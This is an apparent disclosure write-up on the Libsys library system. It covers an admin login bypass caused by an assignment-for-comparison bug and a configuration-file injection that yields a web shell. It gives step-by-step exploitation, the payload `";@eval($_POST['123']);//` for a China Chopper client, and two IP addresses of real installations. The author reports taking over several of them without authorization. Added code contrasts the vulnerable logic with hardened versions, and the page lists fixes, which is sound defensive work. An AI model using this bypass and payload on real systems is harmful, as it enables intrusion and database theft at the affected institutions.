Libsys Library Management System: Authentication Bypass + Getshell in All Versions
Because of a very basic coding error, anyone can log in to the admin panel of any Libsys library system, and because the configuration writer does not filter its input, that access can be turned directly into a web shell (getshell).
The system has a large installed base and is used by schools nationwide. Versions 3.5 through 5.0 are affected; the impact is remote code execution and a full dump of the database.
The vendor's website publishes a list of customer institutions.
The analysis below uses the latest version, 5.0.
Start with the vulnerable file, admin/login.php:
    session_start();
    if (isset($_REQUEST['username'])) {
        $strUser  = trim($_REQUEST['username']);
        $strInput = trim($_REQUEST['passwd']);
        $strMsg   = "incorrect user name or password";
        switch ($strUser) {
            case "opac_admin":
                $strPassWd = $strPassWdFile;
                $strMsg = verify_pwd($strInput, $strPassWd);
                $strUrl = "pai_basic.php";
                break;
            case "view_admin":
                $strPassWd = $strPassWdView;
                $strMsg = verify_pwd($strInput, $strPassWd);
                $strUrl = "cfg_review.php";
                break;
            default:
                $strMsg = "incorrect user name or password";
                break;
        }
        if ($strMsg = false) {          // single '=': assignment, not comparison
            $strMsg = "username or password error";
        } else {
            $_SESSION['ADMIN_USER'] = $strUser;
            header("Location:" . $strUrl);
        }
    }
There are two hard-coded backend administrators: opac_admin, who configures the site, and view_admin, who reviews comments. Any other user name falls through to the default branch, which does nothing but set an error message. The real problem is the check that follows the switch: "if ($strMsg = false)" assigns false to $strMsg instead of comparing, so the condition is always false and the else branch always runs. That branch stores whatever user name was submitted in the ADMIN_USER session variable and redirects. Note that the default branch would not have saved the day even with a correct comparison: it leaves $strMsg as a non-empty string, which this test treats as a successful login.
Now the session check that every other admin page performs:
    session_start();
    if (!isset($_SESSION['ADMIN_USER'])) {
        header("Location:login.php");
        exit();
    }
This only tests whether the session variable exists; it never checks that its value is one of the two real administrator names.
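The following is an added example, not code from Libsys: the decision logic of admin/login.php reduced to its control flow, beside a corrected version that fails closed on unknown user names and on a failed password check. The account table, the use of password_hash()/password_verify(), the stub standing in for verify_pwd(), and the session_is_admin() helper are assumptions for illustration; the page does not show how Libsys stores or checks passwords.

```php
<?php
// Added example, not Libsys code. Assumptions: the $accounts table layout,
// password_hash()/password_verify() for storage, and a stub for verify_pwd().

// ---- Vulnerable shape: mirrors the original flow --------------------------
// Returns the user name that would be stored in $_SESSION['ADMIN_USER'],
// or null if the login is rejected.
function vulnerable_login(string $user, string $input, callable $verify_pwd): ?string
{
    $strMsg = "incorrect user name or password";
    switch ($user) {
        case "opac_admin":
            $strMsg = $verify_pwd($input, "opac-secret");
            break;
        case "view_admin":
            $strMsg = $verify_pwd($input, "view-secret");
            break;
        default:
            $strMsg = "incorrect user name or password";
            break;
    }
    // Bug 1: a single '=' assigns false to $strMsg, so the condition is
    // always false and the rejection branch is dead code.
    // Bug 2: even with '==', the default branch leaves $strMsg a non-empty
    // string, which this test would treat as success.
    if ($strMsg = false) {
        return null;
    }
    return $user;
}

// ---- Hardened shape -------------------------------------------------------
// $accounts: user name => ["hash" => password_hash() output, "url" => landing page]
function hardened_login(string $user, string $input, array $accounts): ?array
{
    // Unknown user names fail closed before any password work is done.
    if (!array_key_exists($user, $accounts)) {
        return null;
    }
    // Strict boolean result; password_verify() compares in constant time.
    if (password_verify($input, $accounts[$user]["hash"]) !== true) {
        return null;
    }
    return ["user" => $user, "url" => $accounts[$user]["url"]];
}

// What every other admin page should check instead of isset() alone:
// the session value must be one of the known administrator names.
function session_is_admin(array $session, array $accounts): bool
{
    return isset($session['ADMIN_USER'])
        && is_string($session['ADMIN_USER'])
        && array_key_exists($session['ADMIN_USER'], $accounts);
}

// ---- Demo with constructed credentials -----------------------------------
$accounts = [
    "opac_admin" => ["hash" => password_hash("opac-secret", PASSWORD_DEFAULT), "url" => "pai_basic.php"],
    "view_admin" => ["hash" => password_hash("view-secret", PASSWORD_DEFAULT), "url" => "cfg_review.php"],
];
// Stub standing in for verify_pwd(): false on mismatch, true on match
// (assumed from how login.php uses its return value).
$verify_pwd = fn(string $input, string $stored): bool => hash_equals($stored, $input);

foreach ([["attacker", "anything"], ["opac_admin", "wrong"], ["opac_admin", "opac-secret"]] as [$u, $p]) {
    printf("%-11s / %-12s vulnerable: %-13s hardened: %s\n",
        $u, $p,
        json_encode(vulnerable_login($u, $p, $verify_pwd)),
        json_encode(hardened_login($u, $p, $accounts)));
}
printf("session check for ADMIN_USER=attacker: %s\n",
    json_encode(session_is_admin(['ADMIN_USER' => 'attacker'], $accounts)));
```

Run it with the PHP CLI: the vulnerable path admits the made-up user "attacker" and also opac_admin with a wrong password, while the hardened path rejects both. In the real login page, a successful hardened_login() should be followed by session_regenerate_id(true) before ADMIN_USER is stored, so that a session fixed before authentication does not carry over.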
Next, pick a few installations from the vendor's customer list to verify this:
http://202.195.136.14:8080/
http://210.33.16.16:8080/
Admin panel: URL + /admin/login.php
Submit the login form with the user name changed to any other value:
The response shows a "user name or password error" message, but that does not matter: the session has already been set, and the configuration pages can be opened directly:
Database configuration: URL + /include/hwopacpwd.php
Website configuration: URL + /include/hwopacpwd.php
The library system's configuration can now be changed at will. The vendor's own demo site has the same problem.
Code analysis also shows that the values written back during a configuration update are not filtered or escaped:
    function write_para($strFileName, $strPara) {
        $fhandle = fopen($strFileName, "wb");
        if ($fhandle) {
            $strPara = "<?php\n" . $strPara . "\n?>";   // value goes into a PHP file verbatim
            if (fwrite($fhandle, $strPara)) {
                fclose($fhandle);
                $strMsg = "The data is modified successfully.";
            } else {
                $strMsg = "Data modification failed.";
            }
        } else {
            $strMsg = "Data modification failed.";
        }
        return $strMsg;
    }
So arbitrary content can be inserted into the configuration file, which is itself PHP. That is enough to append a one-line web shell.
When setting the full-text index folder path, change
c:/hwopac/index/
to
c:/hwopac/index/";@eval($_POST['123']);//
Then open the rewritten configuration file, /include/hwopacpwd.php:
The one-liner has been written in, and a China Chopper client can connect to it.
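The following is an added example, not Libsys code: it shows how a configuration value written by a function shaped like write_para() becomes executable PHP when it is dropped into a string literal, and a writer that validates the value and lets var_export() quote it. The variable name $strIndexPath and the way the caller assembles $strPara are assumptions; the page only shows write_para() itself, not the code that builds its argument.

```php
<?php
// Added example, not Libsys code. Assumption: the caller builds the
// configuration line by concatenating the submitted value into a string
// literal named $strIndexPath before handing it to write_para().

// Vulnerable writer: returns the file contents that would be written.
function write_para_unsafe(string $value): string
{
    $strPara = '$strIndexPath = "' . $value . '";';   // no escaping at all
    return "<?php\n" . $strPara . "\n?>";
}

// Hardened writer: validate first, then emit a properly quoted PHP literal.
function write_para_safe(string $value): string
{
    // A directory path needs letters, digits, separators, ':' for a drive
    // letter and a few punctuation characters; quotes, ';', '$' and '(' are out.
    if (!preg_match('~\A[A-Za-z0-9_:/\\\\.\- ]+\z~', $value)) {
        throw new InvalidArgumentException("invalid index path");
    }
    // var_export() produces a correctly escaped single-quoted string, so even
    // a value that slipped past the check cannot break out of the literal.
    $strPara = '$strIndexPath = ' . var_export($value, true) . ';';
    return "<?php\n" . $strPara . "\n";   // no closing tag: nothing can trail it
}

// Constructed inputs: the legitimate value and the payload from the write-up.
$benign  = 'c:/hwopac/index/';
$payload = 'c:/hwopac/index/";@eval($_POST[\'123\']);//';

echo "--- unsafe, benign value ---\n", write_para_unsafe($benign), "\n\n";
echo "--- unsafe, payload: the file now contains a live @eval() ---\n",
     write_para_unsafe($payload), "\n\n";
echo "--- safe, benign value ---\n", write_para_safe($benign), "\n";
try {
    write_para_safe($payload);
} catch (InvalidArgumentException $e) {
    echo "--- safe, payload ---\nrejected: ", $e->getMessage(), "\n";
}
```

With the payload, the unsafe writer produces the line $strIndexPath = "c:/hwopac/index/";@eval($_POST['123']);//"; which is valid PHP: the assignment closes normally, the eval runs on every include of the file, and the trailing // comments out the leftover quote and semicolon. The hardened writer rejects the value before it is written, and var_export() would still keep it inside the literal if the check were loosened.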
I tried a few of them and took them over successfully; it took only minutes.
Solution:
Fix the comparison in admin/login.php so that a failed password check, and any user name other than the two hard-coded administrators, rejects the login (compare strictly and make the default branch fail explicitly), have the other admin pages check that ADMIN_USER holds one of those two names rather than merely that it is set, and validate and escape every configuration value before write_para() writes it into a PHP file.